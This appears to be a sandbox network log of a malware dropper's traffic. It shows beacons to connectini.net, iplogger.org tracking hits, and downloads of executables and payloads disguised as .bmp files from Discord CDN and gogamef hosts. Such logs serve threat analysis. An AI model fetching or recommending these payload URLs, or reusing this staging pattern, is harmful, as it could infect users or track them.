Network Analysis

POST /Series/SuperNitouDisc.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 51 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /S2S/Disc/Disc.php?ezok=folderlyla1&tesla=7 HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

POST /Series/Conumer4Publisher.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/publisher/1/KR.json HTTP/1.1 Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:34 GMT Content-Type: application/json Content-Length: 4908 Last-Modified: Thu, 18 Mar 2021 13:08:23 GMT Connection: keep-alive ETag: "605350c7-132c" X-Powered-By: PleskLin Accept-Ranges: bytes

POST /Series/Conumer2kenpachi.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:58 GMT Content-Type: application/json Content-Length: 8280 Last-Modified: Fri, 05 Nov 2021 00:00:03 GMT Connection: keep-alive ETag: "61847403-2058" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /Series/configPoduct/2/goodchannel.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:59 GMT Content-Type: application/json Content-Length: 344 Last-Modified: Thu, 18 Mar 2021 13:04:50 GMT Connection: keep-alive ETag: "60534ff2-158" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_installrox2_BumperWw HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_Traffic HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /attachments/905701898806493199/905826613411864596/BumperWW.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

GET /13LYu7 HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:11 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ng06l03rdlsi0svtdqpb6347k5; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977360; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /attachments/891021838312931420/902505896159113296/PL_Client.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:11 GMT Content-Type: image/x-ms-bmp Content-Length: 1329668 Connection: keep-alive CF-Ray: 6a91d72aec4c61a1-ICN Accept-Ranges: bytes Age: 826191 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=PL_Client.bmp ETag: "6542ff843d091ef9901e839405497fa2" Expires: Sat, 05 Nov 2022 00:07:11 GMT Last-Modified: Tue, 26 Oct 2021 10:36:13 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635244573456495 x-goog-hash: crc32c=oNVWKg== x-goog-hash: md5=ZUL/hD0JHvmQHoOUBUl/og== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 1329668 X-GUploader-UploadID: ADPycdtwhWddoZV5AKuuSgGaxbJgxEniZVV1P3_LPByf4iofBWU7eXZA2qToOdd3Cc6Za17w-NgwgP5Tw7qo12HeiHVimhJCEA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dV0NXKRt2D5HS0565M%2BFFc8PXD%2BsOQbFnSLYrYovJq0L78bO4%2BcCJizqbm0h9fGzpTOPhyvPgHyLp%2B%2FlEsqo3F9eGYlQsV0E0lg4k%2BzOEuY7d0DtXWf3h7Uhk7nL%2BppczNE4pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891021838312931420/902505896159113296/PL_Client.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:11 GMT Content-Type: image/x-ms-bmp Content-Length: 1329668 Connection: keep-alive CF-Ray: 6a91d72af8fa0fa8-ICN Accept-Ranges: bytes Age: 826191 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=PL_Client.bmp ETag: "6542ff843d091ef9901e839405497fa2" Expires: Sat, 05 Nov 2022 00:07:11 GMT Last-Modified: Tue, 26 Oct 2021 10:36:13 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635244573456495 x-goog-hash: crc32c=oNVWKg== x-goog-hash: md5=ZUL/hD0JHvmQHoOUBUl/og== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 1329668 X-GUploader-UploadID: ADPycdtwhWddoZV5AKuuSgGaxbJgxEniZVV1P3_LPByf4iofBWU7eXZA2qToOdd3Cc6Za17w-NgwgP5Tw7qo12HeiHVimhJCEA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kho5X1ODfgGaFSVFLQtNp0dmI1AtkWTvekqrIN7vAIQY5CglSHHz9rH9kVzGDc0bSqV9kJQ0j0Wj9%2BjtYqPcwGZxWegm6Qo3WbH43cXRqoLDeK7Sm9saVHhYY3iVqIQedhtF%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /12AVi7 HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:12 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ihnjdqqbfcr1uu21t74818ird1; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977359; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: 1 whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /widget HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ipinfo.io

HTTP/1.1 200 OK access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin content-type: application/json; charset=utf-8 content-length: 876 date: Fri, 05 Nov 2021 00:07:12 GMT x-envoy-upstream-service-time: 21 vary: Accept-Encoding Via: 1.1 google Alt-Svc: clear

GET /widget HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ipinfo.io

HTTP/1.1 200 OK access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin content-type: application/json; charset=utf-8 content-length: 876 date: Fri, 05 Nov 2021 00:07:12 GMT x-envoy-upstream-service-time: 21 vary: Accept-Encoding Via: 1.1 google Alt-Svc: clear

GET /userhome/25/any.exe HTTP/1.1 Host: d.gogamed.com Connection: Keep-Alive

HTTP/1.1 302 Found Date: Fri, 05 Nov 2021 00:07:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive location: https://f.gogamef.com/userhome/25/1bec5879a5da641fb388046719b3c83e.exe CF-Cache-Status: BYPASS Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=THGkEl8YebzGrTYWFKH3qQNH1PdElS7%2FmoXGkhUx%2FlpNDPeCjItkzI1IIBYHWTagr1lwWmsqRCXhxQ5m4MZT8vwwy5jgxUNgAfULRwHQmiEK%2F0e3nk1jPmxZKpgJ7zPs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d7304d760a66-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /userhome/25/1bec5879a5da641fb388046719b3c83e.exe HTTP/1.1 Host: f.gogamef.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:13 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive content-disposition: attachment; filename="huangm.exe" content-transfer-encoding: binary vary: Accept-Encoding Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2926 Last-Modified: Thu, 04 Nov 2021 23:18:27 GMT Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LH4XLoQYf5TL7O1aenJ10a6XhFx3clXPEcUMzSEw61TjV78NznbN4QtFJuI7kzr1JIZS28voX5LFP8LIASKNPttjy%2BlB25%2FcBLZklDWFIav9f07aGdXlUIebLmQYuZts"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d7381d870a4e-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /1Xxky7 HTTP/1.1 Host: iplogger.org

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:15 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=062e5nrhnkkr19jql73enqcjb3; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977356; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: 2 whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_piyyyyWW HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /attachments/891006172130345095/905393686618193921/help0301.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: image/x-ms-bmp Content-Length: 390148 Connection: keep-alive CF-Ray: 6a91d76b5ae50f74-ICN Accept-Ranges: bytes Age: 137326 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=help0301.bmp ETag: "e24aaa8d072d4b39a37b7d0ac310be49" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Wed, 03 Nov 2021 09:51:16 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635933076334878 x-goog-hash: crc32c=wzJFvw== x-goog-hash: md5=4kqqjQctSzmje30KwxC+SQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 390148 X-GUploader-UploadID: ADPycdsXmOTNxdVhbL6qN3BmWaEC4mfyS9Y3xlk9Tyd7-cE2GU58Df4V8x4994eZCq_exTDRDOJJ8cDR9C5YtaOOpB4g0OWJ4A X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FCHJIyhXX3VB97GmKJ9WT1y8mFU0qLhHujNwx%2FkBC5eeifYJn0GV6TRHByj1ULI7IlGFXXPWFup8vsdF4Mu20Q7LK9J7zfPtM1JB0nlepxCC1dSi%2BGkSMtADdAEYH0mEXpmXMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905799227140083712/real0402.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: image/x-ms-bmp Content-Length: 616452 Connection: keep-alive CF-Ray: 6a91d76b5cc612d2-ICN Accept-Ranges: bytes Age: 40841 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=real0402.bmp ETag: "0abbac620fc5aa6125f1f754fcfb7414" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Thu, 04 Nov 2021 12:42:44 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636029764735456 x-goog-hash: crc32c=Ab97mQ== x-goog-hash: md5=CrusYg/FqmEl8fdU/Pt0FA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 616452 X-GUploader-UploadID: ADPycdv9_sIWLR0nl7xfhbI8Dn65JFajqI8JIULA-Nh3BI5yRXwDhh6sRAyX88rAf7RX_WQ30JR3K1vlcA61g0sv3A X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZJL4X1D%2F6QXfggFGnVv49zs%2BjgjkJ8eTM3Ia091GWTCWb%2B7gcNME%2FvVGqMoQsEZg%2Fk%2FXE0rhmjVBtlWFTxLb7PjxJE466CAaHK0OmwTVNgdgaQTCHRUoaIuTOlRjtsAunhl9Vg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanager HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /attachments/905701898806493199/905894437480181790/Setup12.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: application/x-msdos-program Content-Length: 2873495 Connection: keep-alive CF-Ray: 6a91d76c1dc312d2-ICN Accept-Ranges: bytes Age: 15315 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Setup12.exe ETag: "8af36ff6b1f239d0fc0f82dd3d7456f1" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Thu, 04 Nov 2021 19:01:04 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636052464778537 x-goog-hash: crc32c=0ksYgw== x-goog-hash: md5=ivNv9rHyOdD8D4LdPXRW8Q== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2873495 X-GUploader-UploadID: ADPycdvYr1VKpHEmMo8HFuXmvfg6QC4pFT9ofrS2FvARbOMAzYyrqm7OFz_8q36nQjg9EYbMrZGMDD0j7WXWNZldrQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NYAEqzWIabzZD2%2FnGPL0OzW8dVp5ln9q50qgrxP9%2Bal9x32XrC5vd4wGV9dRLZ8b%2BOw148ACOj1xQw2GgwHSzrASeRMxlZ6%2FuB66hX3vQ9GHHcvQfd25BK2KHGb3UsMj8FI6eg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905726762028240896/4chee.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: image/x-ms-bmp Content-Length: 3535068 Connection: keep-alive CF-Ray: 6a91d76d0cb06194-ICN Accept-Ranges: bytes Age: 57554 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=4chee.bmp ETag: "f2450bebf844c7e16864edf376fbc11a" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Thu, 04 Nov 2021 07:54:47 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636012487824445 x-goog-hash: crc32c=qX4c6g== x-goog-hash: md5=8kUL6/hEx+FoZO3zdvvBGg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3535068 X-GUploader-UploadID: ADPycduhvn19mnWLBi_4LatOA9uAWScoGrHYxC4ls_NerTvr2u7fyHH53NHGeqhjBK1BMXOoRWWqLTvs1lrNfDOe-N48DL-UNQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VJbO77vtJjk2jF7hcx%2ByZnSEHbRT470zNusMfR%2F7c1%2FbzrTe5ftsVcFvZA981fmd85xQsRrmeAv7n95lkjjsDEbuAUH%2BXWmTOBiBk%2B3uN7iX4w9JGT6qpKttPaRIzfjifyb8cQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/896617596772839426/897483264074350653/Service.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: image/x-ms-bmp Content-Length: 398336 Connection: keep-alive CF-Ray: 6a91d76d1b58e9f8-ICN Accept-Ranges: bytes Age: 2023618 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Service.bmp ETag: "19b0bf2bb132231de9dd08f8761c5998" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Tue, 12 Oct 2021 13:58:04 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1634047084640154 x-goog-hash: crc32c=8rofXA== x-goog-hash: md5=GbC/K7EyIx3p3Qj4dhxZmA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 398336 X-GUploader-UploadID: ADPycdvNYTbv9XMaMw4eqsPhAZ95SFF6BNMkHC4FIwFjV1JqAmYk09LSMZ2PfxLCVnYxOrXs6E137zs8vxYTubF9S3_V3qUOfw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m5zVr%2BahXPluy%2FXuwTRAGjUxr3vBf%2FQCyaNuEoXPsAv78hqoPZ4K039xxIegAXuu%2F%2FHGCU2qtxLqY0iNg7vO2zY49pKBeODDhjYnb9yGupaA0tWPXIdJ6RgoJ%2FdXNPk7VpVsFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905750415910514738/5780_0401.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: image/x-ms-bmp Content-Length: 593412 Connection: keep-alive CF-Ray: 6a91d76fdce43514-ICN Accept-Ranges: bytes Age: 52423 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=5780_0401.bmp ETag: "837a41d93e768faf1d590537621e8252" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Thu, 04 Nov 2021 09:28:47 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636018127226662 x-goog-hash: crc32c=GGonVw== x-goog-hash: md5=g3pB2T52j68dWQU3Yh6CUg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 593412 X-GUploader-UploadID: ADPycdse1gxmJRBpy2LGORhd2yljYgBKlsNI_i_fikySaRzcCHkRuzqNAgrK9r4g6fdigCYep8H2SfRK2xuplbz5Ng X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gv7dRQqDA9vNtifv0D6%2F97vVBIVfaAjzbOqZkVpJWE8ZceF41szHhJQkhE2Qve5yq%2FTt3wnaj4UEpG7x5W7GtMgCcQ2yUtOzfpAj1DcngigxYCXfwBSU3%2BLiWBBvzEiyJuoMXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/896617596772839426/897483264074350653/Service.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: image/x-ms-bmp Content-Length: 398336 Connection: keep-alive CF-Ray: 6a91d77018970158-ICN Accept-Ranges: bytes Age: 2023618 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Service.bmp ETag: "19b0bf2bb132231de9dd08f8761c5998" Expires: Sat, 05 Nov 2022 00:07:22 GMT Last-Modified: Tue, 12 Oct 2021 13:58:04 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1634047084640154 x-goog-hash: crc32c=8rofXA== x-goog-hash: md5=GbC/K7EyIx3p3Qj4dhxZmA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 398336 X-GUploader-UploadID: ADPycdvNYTbv9XMaMw4eqsPhAZ95SFF6BNMkHC4FIwFjV1JqAmYk09LSMZ2PfxLCVnYxOrXs6E137zs8vxYTubF9S3_V3qUOfw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cqVnnhn2bMJzBuBwcKrMObItmFvqj4UTqlxKUii8fq0xbukaSH0bcCLUcMb5yLkUTH8B8QwB2ZIO%2B7i2da7Ek8a8X5ujWcQD1xdSB%2BJ5TF%2BZP%2BlDeDkXa6nklXNZftwU%2BWa1jA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/905701898806493199/905894437480181790/Setup12.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

